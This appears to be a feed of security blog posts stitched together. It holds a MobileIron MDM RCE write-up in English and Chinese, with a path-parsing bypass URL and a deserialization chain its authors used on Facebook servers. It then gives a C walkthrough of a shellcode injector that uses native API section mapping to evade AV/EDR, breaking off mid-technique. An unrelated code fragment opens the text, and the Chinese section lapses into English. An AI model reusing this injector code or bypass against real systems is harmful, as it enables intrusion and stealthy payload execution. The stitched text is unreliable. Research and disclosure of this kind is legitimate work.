        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

11 September 2020 at 16:00

Hi, it's been a long time since my last article. This post is about my research from this March: how I found vulnerabilities in a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities were reported to the vendor and fixed in June. After that, we kept monitoring large corporations to track the overall patching progress, and found that Facebook didn't keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported it to their Bug Bounty program!

This research was also presented at HITCON 2020. You can check the slides here!


As a red team, we are always looking for new paths to infiltrate the corporate network from the outside, just like our research at Black Hat USA last year, where we demonstrated how leading SSL VPNs could be hacked and become your Virtual "Public" Network! SSL VPN is trusted to be secure and considered the only way into your private network. But what if your trusted appliances are insecure?

Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that!

What is MDM?

Mobile Device Management, also known as MDM, is an asset inventory system that makes employees' BYOD devices more manageable for enterprises. It was proposed around 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that devices run under corporate policy and in a trusted environment. Enterprises can manage assets, install certificates, deploy applications, and even lock or wipe devices remotely to prevent data leakage.

UEM (Unified Endpoint Management) is a newer term related to MDM with a broader definition of managed devices. In the following, we use MDM to refer to this class of products!

Our target

MDM, as a centralized system, can manage and control all employees' devices. It is undoubtedly an ideal asset inventory system for a growing company. Besides, MDM must be publicly reachable to synchronize devices all over the world. A centralized, publicly exposed appliance: what could be more appealing to hackers?

Therefore, we have seen hackers and APT groups abusing MDM in recent years! For example, phishing victims into enrolling so that a malicious MDM becomes the C&C server of their mobile devices, or even compromising a corporation's exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let's Hide This App by the Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by the CheckPoint CPR team for more details!

From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with?

We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron!

So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers use it as well. We also know Facebook has exposed a MobileIron server since 2016. We analyzed the Fortune Global 500 as well and found more than 15% of them using and exposing MobileIron servers to the public! For all these reasons, it became our main target!

Where to Start

From past vulnerabilities, we learned that not many researchers have dived into MobileIron. Perhaps the attack vector is still unknown, but we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning pure black-box testing into gray-box or white-box testing is vital. We spent lots of time searching for all kinds of information on the Internet and ended up with an RPM package. This RPM file is supposed to be a developer's testing package, and it was just sitting on a listable web root, indexed by Google Search.

Anyway, we got a file to research. The file's release date is early 2018; it seems a little old, but it's still better than nothing!

P.S. We have informed MobileIron, and the sensitive files have now been removed.

Finding Vulnerabilities

After a painful time solving dependency hell, we finally set the testing package up. The product is based on Java and exposes three ports:

  • 443 - the user enrollment interface
  • 8443 - the appliance management interface
  • 9997 - the MobileIron device synchronization protocol (MI Protocol)

All open ports are TLS-encrypted. Apache sits in front of the web part and proxies all connections to the backend, a Tomcat with Spring MVC inside.

Due to Spring MVC, it's hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture was our goal this time!

Talking about the vulnerability, the root cause is straightforward: Tomcat exposes a Web Service that deserializes user input in Hessian format. However, this doesn't mean we can do everything! The main effort of this article is to solve the obstacles that follow, so please see the exploitation below.

Although we know the Web Service deserializes user input, we cannot trigger it yet. The endpoint is located on both:

  • User enrollment interface - https://mobileiron/mifs/services/
  • Management interface - https://mobileiron:8443/mics/services/

We can only reach the deserialization through the management interface, because the user interface blocks access to the Web Service. That was a critical hit for us: most enterprises won't expose their management interface to the Internet, and a management-only vulnerability is not very useful, so we had to try harder. :(

Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right?

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

MobileIron relies on Apache rewrite rules to block all access to the Web Service. Apache is the front of a reverse-proxy architecture, and the backend is a Java-based web server.

Does that remind you of something?


Yes, the Breaking Parser Logic! It's the reverse proxy attack surface I proposed in 2015 and presented at Black Hat USA 2018. This technique leverages the inconsistency between how Apache and Tomcat parse paths to bypass the ACL and re-access the Web Service: Tomcat treats the ; in /.;/ as a path parameter and normalizes the segment away, while Apache sees a literal path that no longer matches ^/mifs/services. By the way, this excellent technique was also applied to the recent F5 BIG-IP TMUI RCE vulnerability (CVE-2020-5902)!

https://mobileiron/mifs/.;/services/someService

Exploiting Vulnerabilities

OK, now we have access to the deserialization whether it's on the enrollment interface or the management interface. Let's get back to exploitation!

Moritz Bechler has awesome research summarizing the Hessian deserialization vulnerability in his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn that Hessian deserialization triggers equals() and hashCode() while reconstructing a HashMap, and can also trigger toString() through XString. The known exploit gadgets so far are:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection.

  Gadget           Effect          Usable here?
  Apache XBean     JNDI Injection  no
  Caucho Resin     JNDI Injection  no
  Spring AOP       JNDI Injection  yes
  ROME EqualsBean  RCE             no

Once we have a JNDI Injection, the rest of the exploitation is easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh's work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get code execution… or is that true?


Since Alvaro Muñoz and Oleksandr Mirosh introduced this at Black Hat, this technique has helped countless security researchers and brought Java deserialization vulnerabilities into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. Since then, all Java versions higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-class loading. Therefore, to exploit the Hessian deserialization on the latest MobileIron, we must face this problem!

Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to false to prevent attackers from loading remote URL classes to get code execution. But only that has been prohibited. We can still manipulate JNDI and redirect the Naming Reference to a local Java class!

The concept is a little bit similar to Return-Oriented Programming: utilize an existing local Java class to do further exploitation. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin from early 2019 for details. It describes post-mitigation JNDI exploitation and how to abuse Tomcat's BeanFactory to populate the ELProcessor gadget and get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article:

Besides javax.el.ELProcessor, there are of course many other classes that meet the requirements and can be injected into BeanFactory as the beanClass. For example, if the target machine's classpath contains the Groovy library, it can be combined with the Jenkins vulnerability Orange previously published to achieve exploitation.

It seems the Meta Programming exploitation from my previous Jenkins research could be used here as well. It makes Meta Programming great again :D


The approach is fantastic and looks feasible for us. But both gadgets, ELProcessor and ParseClass, are unavailable due to our outdated target libraries. Tomcat introduced ELProcessor in 8.5, but our target runs 7. As for the Groovy gadget, the target's Groovy version is too old (1.5.6 from 2008) to support Meta Programming, so we still had to find a new gadget ourselves. In the end we found a new gadget on GroovyShell. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project!

Attacking Facebook

Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook!

As mentioned before, we have known Facebook uses MobileIron since 2016. Although the server's index page responds with 403 Forbidden now, the Web Service is still accessible!

Everything was ready and waiting for our exploit! However, several days before the scheduled attack, we realized there was a critical problem in our exploit. From the last time we popped a shell on Facebook, we knew it blocks outbound connections due to security concerns. An outbound connection is vital for JNDI Injection, because the idea is to make the victim connect to a malicious server for further exploitation. But now we couldn't even make an outbound connection, let alone anything else.


So far, all attack surfaces for JNDI Injection had been closed, so we had no choice but to return to Hessian deserialization. Due to the lack of available gadgets, we had to discover a new one ourselves!


Before discovering a new gadget, we had to properly understand the root cause of the existing gadgets. After re-reading Moritz Bechler's paper, a certain sentence caught my interest:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


A question quickly came up in my mind: why did the author leave this sentence here? Although it fails with an exception, there must have been something special for the author to write it down.

Our target runs a very old Groovy, so we guessed that the readResolve() constraint might not have been applied to the codebase yet! We compared the file groovy/runtime/MethodClosure.java between the latest version and 1.5.6:

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Yes, we were right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned that CVE-2015-3253 is exactly about that: a mitigation for the rising tide of Java deserialization vulnerabilities in 2015. Since Groovy is an internally used library, developers won't update it if there is no emergency. The outdated Groovy is also a good case study demonstrating how a seemingly harmless component can leave you compromised!

Of course we got the shell on Facebook in the end. Here is the video:

Vulnerability Report and Patch

We finished all the research in March and sent the advisory to MobileIron on April 3. MobileIron released the patch on June 15 and assigned three CVEs. You can check the official website for details!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

After the patch was released, we started monitoring the Internet to track the overall patching progress. Here we only check the Last-Modified header on static files, so the result is just for reference. (Unknown means the server has both ports 443 and 8443 closed.)


At the same time, we kept our attention on Facebook as well. After confirming no patch for 15 days, we finally popped a shell and reported it to their Bug Bounty program on July 2!

Conclusion

So far, we have demonstrated a completely unauthenticated RCE on MobileIron: how we got the firmware, found the vulnerability, and bypassed the JNDI mitigation and the network limitation. There are other stories, but due to time we just list the topics here for those who are interested:

  • How to take over the employees’ devices from MDM
  • Disassemble the MI Protocol
  • And the CVE-2020-15506, an interesting authentication bypass

I hope this article could draw attention to MDM and the importance of enterprise security! Thanks for reading. :D

看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!

11 September 2020 at 16:00

English Version 中文版本

嗨! 好久不見,這是我在今年年初的研究,講述如何尋找一款知名行動裝置管理產品的漏洞,並繞過層層保護取得遠端程式碼執行的故事! 其中的漏洞經回報後在六月由官方釋出修補程式並緊急通知他們的客戶,而我們也在修補程式釋出 15 天後發現 Facebook 並未及時更新,因此透過漏洞取得伺服器權限並回報給 Facebook!

此份研究同時發表於 HITCON 2020,你可以從這裡取得這次演講的投影片!


身為一個專業的紅隊,我們一直在尋找著更快速可以從外部進入企業內網的最佳途徑! 如同我們去年在 Black Hat USA 發表的研究,SSL VPN 理所當然會放在外部網路,成為保護著網路安全、使員工進入內部網路的基礎設施,而當你所信任、並且用來保護你安全的設備不再安全了,你該怎麼辦?

由此為發想,我們開始尋找著有沒有新的企業網路脆弱點可當成我們紅隊攻擊滲透企業的初始進入點,在調查的過程中我們對 MDM/UEM 開始產生了興趣,而這篇文章就是從此發展出來的研究成果!

什麼是 MDM/UEM ?

Mobile Device Management,簡稱 MDM,約是在 2012 年間,個人手機、平板裝置開始興起時,為了使企業更好的管理員工的 BYOD 裝置,應運而生的資產盤點系統,企業可以透過 MDM 產品,管理員工的行動裝置,確保裝置只在信任的環境、政策下運行,也可以從中心的端點伺服器,針對所控制的手機,部署應用程式、安裝憑證甚至遠端操控以管理企業資產,更可以在裝置遺失時,透過 MDM 遠端上鎖,或是抹除整台裝置資料達到企業隱私不外漏的目的!

UEM (Unified Endpoint Management) 則為近幾年來更新的一個術語,其核心皆為行動裝置的管理,只是 UEM 一詞包含更廣的裝置定義! 我們以下皆用 MDM 一詞來代指同類產品。

我們的目標

MDM 作為一個中心化的端點控制系統,可以控制、並管理旗下所有員工個人裝置! 對日益壯大的企業來說,絕對是一個最佳的資產盤點產品,相對的,對駭客來說也是! 而為了管理來自世界各地的員工裝置連線,MDM 又勢必得曝露在外網。 一個可以「管理員工裝置」又「放置在外網」的設備,這對我們的紅隊演練來說無疑是最棒的滲透管道!

另外,從這幾年的安全趨勢也不難發現 MDM 逐漸成為駭客、APT 組織的首選目標! 誘使受害者同意惡意的 MDM 成為你裝置的 C&C 伺服器,或是乾脆入侵企業放置在外網的 MDM 設備,在批次地派送行動裝置木馬感染所有企業員工手機、電腦,以達到進一步的攻擊! 這些都已成真,詳細的報告可參閱 Cisco Talos 團隊所發表的 Malicious MDM: Let’s Hide This App 以及 CheckPoint CPR 團隊所發表的 First seen in the wild - Malware uses Corporate MDM as attack vector!

從前面的幾個案例我們得知 MDM 對於企業安全來說,是一個很好的切入點,因此我們開始研究相關的攻擊面! 而市面上 MDM 廠商有非常多,各個大廠如 Microsoft、IBM 甚至 Apple 都有推出自己的 MDM 產品,我們要挑選哪個開始成為我們的研究對象呢?

因此我們透過公開情報列舉了市面上常見的 MDM 產品,並配合各家特徵對全世界進行了一次掃描,發現最多企業使用的 MDM 為 VMware AirWatch 與 MobileIron 這兩套產品! 至於要挑哪一家研究呢? 我們選擇了後者,除了考量到大部分的客戶都是使用 MobileIron 外,另外一個吸引我的點則是 Facebook 也是他們的客戶! 從我們在 2016 年發表的 How I Hacked Facebook, and Found Someone’s Backdoor Script 研究中,就已發現 Facebook 使用 MobileIron 作為他們的 MDM 解決方案!

根據 MobileIron 官方網站描述,至少有 20000+ 的企業使用 MobileIron 當成他們的 MDM 解決方案,而根據我們實際對全世界的掃描,也至少有 15% 以上的財富世界 500 大企業使用 MobileIron 且曝露在外網(實際上一定更多),因此,尋找 MobileIron 的漏洞也就變成我們的首要目標!

如何開始研究

過往出現過的漏洞可以得知 MobileIron 並沒有受到太多安全人員研究,其中原因除了 MDM 這個攻擊向量尚未廣為人知外,另一個可能是因為關於 MobileIron 的相關韌體太難取得,研究一款設備最大的問題是如何從純粹的黑箱,到可以分析的灰箱、甚至白箱! 由於無法從官網下載韌體,我們花費了好幾天嘗試著各種關鍵字在網路上尋找可利用的公開資訊,最後才在 Goolge Search 索引到的其中一個公開網站根目錄上發現疑似是開發商測試用的 RPM 包。

下載回的韌體為 2018 年初的版本,離現在也有很長一段時間,也許核心程式碼也大改過,不過總比什麼都沒有好,因此我們就從這份檔案開始研究起。

備註: 經通知 MobileIron 官方後,此開發商網站已關閉。

如何尋找漏洞

整個 MobileIron 使用 Java 作為主要開發語言,對外開放的連接埠為 443, 8443, 9997,各個連接埠對應功能如下:

  • 443 為使用者裝置註冊介面
  • 8443 為設備管理介面
  • 9997 為一個 MobileIron 私有的裝置同步協定 (MI Protocol)

三個連接埠皆透過 TLS 保護連線的安全性及完整性,網頁部分則是透過 Apache 的 Reverse Proxy 架構將連線導至後方,由 Tomcat 部署的網頁應用處理,網頁應用則由 Spring MVC 開發。

由於使用的技術架構相對新,傳統類型的漏洞如 SQL Injection 也較難從單一的點來發現,因此理解程式邏輯並配合架構層面的攻擊就變成我們這次尋找漏洞的主要目標!

這次的漏洞也很簡單,主要是 Web Service 使用了 Hessian 格式處理資料進而產生了反序列化的弱點! 雖然漏洞一句話就可以解釋完了,但懂的人才知道反序列化並不代表你可以做任何事,接下來的利用才是精彩的地方!

現在已知 MobileIron 在處理 Web Service 的地方存在 Hessian 反序列化漏洞! 但漏洞存在,並不代表我們碰得到漏洞,可以觸發 Hessian 反序列化的路徑分別在:

  • 一般使用者介面 - https://mobileiron/mifs/services/
  • 管理介面 - https://mobileiron:8443/mifs/services/

管理介面基本上沒有任何阻擋,可以輕鬆的碰到 Web Service,而一般使用者介面的 Web Service 則無法存取,這對我們來說是一個致命性的打擊,由於大部分企業的網路架構並不會將管理介面的連接埠開放在外部網路,因此只能攻擊管理介面對於的利用程度並不大,因此我們必須尋找其他的方式去觸發這個漏洞!

仔細觀察 MobileIron 的阻擋方式,發現它是透過在 Apache 上使用 Rewrite Rules 去阻擋對一般使用者介面 Web Service 的存取:

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

嗯,很棒! 使用 Reverse Proxy 架構而且是在前面那層做阻擋,你是否想到什麼呢?



沒錯! 就是我們在 2015 年發現,並且在 Black Hat USA 2018 上所發表的針對 Reverse Proxy 架構的新攻擊面 Breaking Parser Logic! 這個優秀的技巧最近也被很好的利用在 CVE-2020-5902,F5 BIG-IP TMUI 的遠端程式碼執行上!

透過 Apache 與 Tomcat 對路徑理解的不一致,我們可以透過以下方式繞過 Rewrite Rule 再一次攻擊 Web Service!

https://mobileiron/mifs/.;/services/someService

碰! 因此現在不管是 8443 的管理介面還是 443 的一般使用者介面,我們都可以碰到有 Hessian 反序列化存在的 Web Service 了!

如何利用漏洞

現在讓我們回到 Hessian 反序列化的利用上! 針對 Hessian 反序列化,Moritz Bechler 已經在他的 Java Unmarshaller Security 中做了一個很詳細的研究報告! 從他所開源的 marshalsec 原始碼中,我們也學習到 Hessian 在反序列化過程中除了透過 HashMap 觸發 equals() 以及 hashcode() 等觸發點外,也可透過 XString 串出 toString(),而目前關於 Hessian 反序列化已存在的利用鏈有四條:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

而根據我們的目標環境,可以觸發的只有 Spring AOP 這條利用鏈!

  Name Effect
x Apache XBean JNDI 注入
x Caucho Resin JNDI 注入
Spring AOP JNDI 注入
x ROME EqualsBean RCE

無論如何,我們現在有了 JNDI 注入後,接下來只要透過 Alvaro MuñozOleksandr Mirosh 在 Black Hat USA 2016 上所發表的 A Journey From JNDI/LDAP to Remote Code Execution Dream Land 就可以取得遠端程式碼執行了… 甘安內?


自從 Alvaro MuñozOleksandr Mirosh 在 Black Hat 發表了這個新的攻擊向量後,不知道幫助了多少大大小小的駭客,甚至會有人認為「遇到反序列化就用 JNDI 送就對了!」,但自從 2018 年十月,Java 終於把關於 JNDI 注入的最後一塊拼圖給修復,這個修復被記載在 CVE-2018-3149 中,自此之後,所有 Java 高於 8u181, 7u191, 6u201 的版本皆無法透過 JNDI/LDAP 的方式執行程式碼,因此若要在最新版本的 MobileIron 上實現攻擊,我們勢必得面對這個問題!

關於 CVE-2018-3149,是透過將 com.sun.jndi.ldap.object.trustURLCodebase 的預設值改為 False 的方式以達到禁止攻擊者下載遠端 Bytecode 取得執行程式碼。

但幸運的是,我們依然可以透過 JNDI 的 Naming Reference 到本機既有的 Class Factory 上! 透過類似 Return-Oriented Programming 的概念,尋找本機 ClassPath 中可利用的類別去做更進一步的利用,詳細的手法可參考由 Michael Stepankin 在 2019 年年初所發表的 Exploiting JNDI Injections in Java,裡面詳細敘述了如何透過 Tomcat 的 BeanFactory 去載入 ELProcessor 達成任意程式碼執行!

這條路看似通暢,但實際上卻差那麼一點,由於 ELProcessor 在 Tomcat 8 後才被引入,因此上面的繞過方式只能在 Tomcat 版本大於 8 後的某個版本才能成功,而我們的目標則是 Tomcat 7.x,因此得為 BeanFactory 尋找一個新的利用鏈! 而經過搜尋,發現在 Welkin文章中所提到:

除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用


目標的 ClassPath 上剛好有 Groovy 存在! 於是我們又讓 Meta Programming 偉大了一次 :D

然而事實上,目標伺服器上 Groovy 版本為 1.5.6,是一個距今十年前老舊到不支援 Meta Programming 的版本,所以我們最後還是基於 Groovy 的程式碼,重新尋找了一個在 GroovyShell 上的利用鏈! 詳細的利用鏈可參考我送給 JNDI-Injection-Bypass 的這個 Pull Request!

攻擊 Facebook

現在我們已經有了一個基於 JNDI + BeanFactory + GroovyShell 的完美遠端程式碼執行漏洞,接下來就開始攻擊 Facebook 吧! 從前文提到,我們在 2016 年時就已知 Facebook 使用 MobileIron 當作他們的 MDM 解決方案,雖然現在再檢查一次發現首頁直接變成 403 Forbidden 了,不過幸運的是 Web Service 層並無阻擋! s

萬事俱備,只欠東風! 正當要攻擊 Facebook 的前幾天,我們突然想到,從上次進入 Facebook 伺服器的經驗,由於安全上的考量,Facebook 似乎會禁止所有對外部非法的連線,這點對我們 JNDI 注入攻擊有著至關重要的影響! 首先,JNDI 注入的核心就是透過受害者連線至攻擊者控制的惡意伺服器,並接收回傳的惡意 Naming Reference 後所導致的一系列利用,但現在連最開始的連線到攻擊者的惡意伺服器都無法,更別談後續的利用。


At this point, every road to JNDI injection was blocked, and we had to go back to the Hessian deserialization and rethink! None of the existing gadget chains could achieve remote code execution on this target, so we had to abandon JNDI injection and find a brand-new chain!



To find a new chain, we first had to deeply understand the principles and root causes of the existing ones. Rereading the Java Unmarshaller Security paper, one sentence caught my curiosity:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


Huh, why would the author make a point of adding this sentence? I formed a hypothesis:

The author must have evaluated the feasibility of Groovy as a gadget chain; even though it was blocked, he presumably thought it promising enough to mention in the paper!


Starting from this hunch: the Groovy chain may be blocked by readResolve(), but our target happens to run a very old Groovy, so perhaps the restriction had not yet been added to the library!

We compared the readResolve() implementation in groovy/runtime/MethodClosure.java between Groovy-1.5.6 and the latest version:

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Sure enough, the old version has no ALLOW_RESOLVE restriction. A little archaeology shows that the restriction was Groovy's own mitigation against the wave of Java deserialization vulnerabilities that appeared in 2015, and it was even assigned CVE-2015-3253! Because Groovy is a small supporting component, used only internally and never exposed to the outside, developers have no particular reason to update it, which is exactly how it became a link in our attack chain! This proves once again that any seemingly insignificant component can become the reason you get hacked!

Finally, of course, we successfully got a shell on a Facebook server; a demo video accompanies the original post.

Vulnerability Report and Fix

We finished the research around March and wrote it up as a report on April 3, reporting it to MobileIron through [email protected]! The vendor started working on a fix upon receiving it, released patches on June 15, and assigned three CVEs. For details on the fixes, please refer to the official MobileIron website!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

Once the official patches were out, we also started monitoring the patch status of companies around the world that use MobileIron. We only checked the Last-Modified header of static files, so the results are for reference only and do not fully reflect reality (Unknown means 443/8443 was not exposed and the check could not be performed).


Meanwhile, we kept monitoring Facebook, and after confirming it had remained unpatched for 15 days, we got into a Facebook server on July 2 and then reported to the Facebook Bug Bounty Program!

Conclusion

With this, we have demonstrated end to end how to hunt for vulnerabilities in an MDM server: from bypassing Java language-level protections and network restrictions to writing the exploit and successfully using it in a Bug Bounty Program! The article is already long, and there are many stories we did not have room for; here are a few leads for anyone interested in digging further:

  • How to pivot from the MDM server to take control of employees' mobile devices
  • How to analyze MobileIron's proprietary MI Protocol
  • CVE-2020-15506 is, at its core, a very interesting authentication bypass

We hope this article draws attention to the MDM attack surface and to the importance of enterprise security! Thanks for reading :D

SeasideBishop: A C port of the UrbanBishop shellcode injector

3 September 2020 at 15:20

SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector

Introduction

This post covers a recent C port I wrote of b33f’s neat C# shellcode loader UrbanBishop. The prolific Rastamouse also did a variation of UrbanBishop using D/Invoke, called RuralBishop. This injection method has some quirks I hadn’t seen done before, so I thought it would be interesting to port it to C.

Credit of course goes to b33f and Rastamouse, and special thanks to AsaurusRex and Adamant for their help in getting it working.

The code for this post is available here.

The Code

First, a quick outline of the injection method, and then I will break it down API by API. SeasideBishop creates a section and maps a view of it locally, opens a handle to a remote process, maps a view of that same section into the process, and copies shellcode into the local view. As a view of the same section is also mapped in the remote process, the shellcode has now been allocated across processes. Next a remote thread is created and an APC is queued on it. The thread is alerted and the shellcode runs.

Opening The Remote Process

[screenshot: opening the target process with NtOpenProcess]

Above we see the use of the native API NtOpenProcess to acquire a handle to the remote process. Native API calls are used throughout SeasideBishop, as they tend to be a bit more stealthy than Win32 APIs, though they are still vulnerable to userland hooking.
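Since the original post's screenshots don't reproduce here, each step below is paired with a minimal C sketch of my own. These are reconstructions, not the repo's verbatim code: the Nt*/Ldr* prototypes are undocumented, so the typedefs follow the commonly published definitions, and names like pid and OpenTarget are placeholders.

#include <windows.h>
#include <winternl.h>

// CLIENT_ID mirror; winternl.h does not expose this structure
typedef struct _SB_CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } SB_CLIENT_ID;
typedef NTSTATUS(NTAPI* NtOpenProcess_t)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, SB_CLIENT_ID*);

HANDLE OpenTarget(DWORD pid)
{
    // Resolve the native call at runtime; there is no import-library stub for it
    NtOpenProcess_t pNtOpenProcess = (NtOpenProcess_t)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtOpenProcess");

    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
    SB_CLIENT_ID cid = { (HANDLE)(ULONG_PTR)pid, NULL };

    HANDLE hRemoteProcess = NULL;
    NTSTATUS status = pNtOpenProcess(&hRemoteProcess, PROCESS_ALL_ACCESS, &oa, &cid);
    return (status >= 0) ? hRemoteProcess : NULL;  // NTSTATUS >= 0 means success
}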

Sections

A neat feature of this technique is the way that the shellcode is allocated in the remote process. Instead of using a more common and suspicious API like WriteProcessMemory, which is well known to AV/EDR products, SeasideBishop takes advantage of memory mapped files. This is a way of copying some or all of a file into memory and operating on it there, rather than manipulating it directly on disk. Another way of using it, which we will do here, is as an inter-process communication (IPC) mechanism. The memory mapped file does not actually need to be an ordinary file on disk. It can be simply a region of memory backed by the system page file. This way two processes can map the same region in their own address space, and any changes are immediately accessible to the other.

The way a region of memory is mapped is by calling the native API NtCreateSection. As the name indicates, a section, or section object, is the term for the memory mapped region.

[screenshot: creating the section with NtCreateSection]

Above is the call to NtCreateSection within the local process. We create a section with a size of 0x1000, or 4096 bytes. This is enough to hold our demo shellcode, but might need to be increased to accommodate a larger payload. Note that the allocation will be rounded up to the nearest page size, which is normally 4k.
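A sketch of that call, under the same caveats (the prototype is the commonly published one, and the size handling is simplified):

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS(NTAPI* NtCreateSection_t)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES,
                                           PLARGE_INTEGER, ULONG, ULONG, HANDLE);

HANDLE CreatePayloadSection(SIZE_T size)
{
    NtCreateSection_t pNtCreateSection = (NtCreateSection_t)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtCreateSection");

    LARGE_INTEGER maxSize;
    maxSize.QuadPart = size;  // e.g. 0x1000; the kernel rounds up to a full page

    // NULL FileHandle = pagefile-backed section; RWX on the section itself lets the
    // local view be mapped RW and the remote view RX
    HANDLE hSection = NULL;
    NTSTATUS status = pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &maxSize,
                                       PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
    return (status >= 0) ? hSection : NULL;
}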

The next step is to create a view of the section. The section object is not directly manipulated, as it represents the file-backed region of memory. We create a view of the section and make changes to that view. The remote process can also map a view using the same section handle, thereby accessing the same section. This is what allows IPC to happen.

[screenshot: mapping a local view with NtMapViewOfSection]

Here we see the call to NtMapViewOfSection to create the view in the local process. Notice the use of RW and not RWX permissions, as we simply need to write the shellcode to the view.

[screenshot: memcpy of the shellcode into the local view]

Next a simple memcpy writes our shellcode to the view.
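A sketch of the local mapping and the copy, with the same hedges as above (ViewUnmap is the value 2 of the SECTION_INHERIT enumeration):

#include <windows.h>
#include <winternl.h>
#include <string.h>

typedef NTSTATUS(NTAPI* NtMapViewOfSection_t)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T,
                                              PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);

PVOID MapPayloadLocally(HANDLE hSection, const unsigned char* shellcode, SIZE_T len)
{
    NtMapViewOfSection_t pNtMapViewOfSection = (NtMapViewOfSection_t)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");

    PVOID localView = NULL;
    SIZE_T viewSize = 0;

    // RW is enough locally; we only write the payload into this view
    NTSTATUS status = pNtMapViewOfSection(hSection, GetCurrentProcess(), &localView, 0, 0,
                                          NULL, &viewSize, 2 /* ViewUnmap */, 0, PAGE_READWRITE);
    if (status >= 0)
        memcpy(localView, shellcode, len);  // the payload now lives in the shared section
    return localView;
}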

[screenshot: mapping the remote view with NtMapViewOfSection]

Finally we map a view of the same section in the remote process. Note that this time we use RX permissions so that the shellcode is executable. Now we have our shellcode present in the remote process’s memory, without using APIs like WriteProcessMemory. Now let’s work on executing it.
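Continuing the sketch, the remote mapping reuses the same function pointer and the handle obtained from NtOpenProcess; only the target handle and the page protection change:

// Same NtMapViewOfSection_t pointer as above; hRemoteProcess from the NtOpenProcess step
PVOID remoteView = NULL;
SIZE_T viewSize = 0;
NTSTATUS status = pNtMapViewOfSection(hSection, hRemoteProcess, &remoteView, 0, 0,
                                      NULL, &viewSize, 2 /* ViewUnmap */, 0, PAGE_EXECUTE_READ);
// remoteView is now the address of the shellcode inside the target process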

Starting From The End

In order to execute our shellcode in the remote process, we need a thread. In order to create one, we need to give the thread a function or address to begin executing from. Though we are not using Win32 APIs, the documentation for CreateRemoteThreadEx still applies. We need a “pointer to [an] application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and [serve as] the starting address of the thread in the remote process. The function must exist in the remote process.” The function we will use is RtlExitUserThread. This is not a very well documented function, but debugging indicates that this function is part of the thread termination process. So if we tell our thread to begin executing at this function, we are guaranteed that the thread will exit gracefully. That’s always a good thing when injecting into remote processes.

So now that we know the thread will exit, how do we get it to execute our code? We’ll get there soon, but first we need to get the address of RtlExitUserThread so that we can use it as the start address of our new remote thread.

[screenshot: resolving the address of RtlExitUserThread]

